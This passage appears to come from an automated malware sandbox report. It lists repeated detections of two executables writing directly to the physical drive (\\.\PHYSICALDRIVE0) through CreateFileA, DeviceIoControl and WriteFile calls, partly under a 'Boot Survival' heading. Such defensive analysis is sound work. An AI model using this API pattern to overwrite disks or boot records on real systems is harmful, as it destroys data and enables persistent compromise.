            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 22_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 23_2_00849EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 23_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 25_2_00409EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 25_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 26_2_00829EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 26_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 27_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 27_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 29_2_005D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 29_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 30_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 30_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 31_2_00919EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE031_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE032_2_00399EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE032_2_00399D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE033_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE033_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE034_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE034_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE035_2_00159EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE035_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE036_2_007F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE036_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE037_2_00259EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE037_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE038_2_00269EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE038_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE039_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE039_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE040_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE040_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE041_2_00289EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE041_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE042_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE042_2_00109D90

            Boot Survival

            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 4_2_00369EC0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 4_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 4_2_00409EC0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 4_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 9_2_003D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 9_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 10_2_00189EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 10_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 11_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 11_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 12_2_00419EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 12_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 13_2_001B9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 13_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 14_2_00359EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 14_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 15_2_00319EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 15_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 16_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 16_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 17_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 17_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 18_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 18_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 19_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 19_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 20_2_00329EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 20_2_00329D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 21_2_00519EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 21_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 22_2_00199EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 22_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 23_2_00849EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 23_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 25_2_00409EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 25_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 26_2_00829EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 26_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 27_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 27_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 29_2_005D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 29_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 30_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 30_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 31_2_00919EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 31_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE0 | 32_2_00399EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE0 | 32_2_00399D90
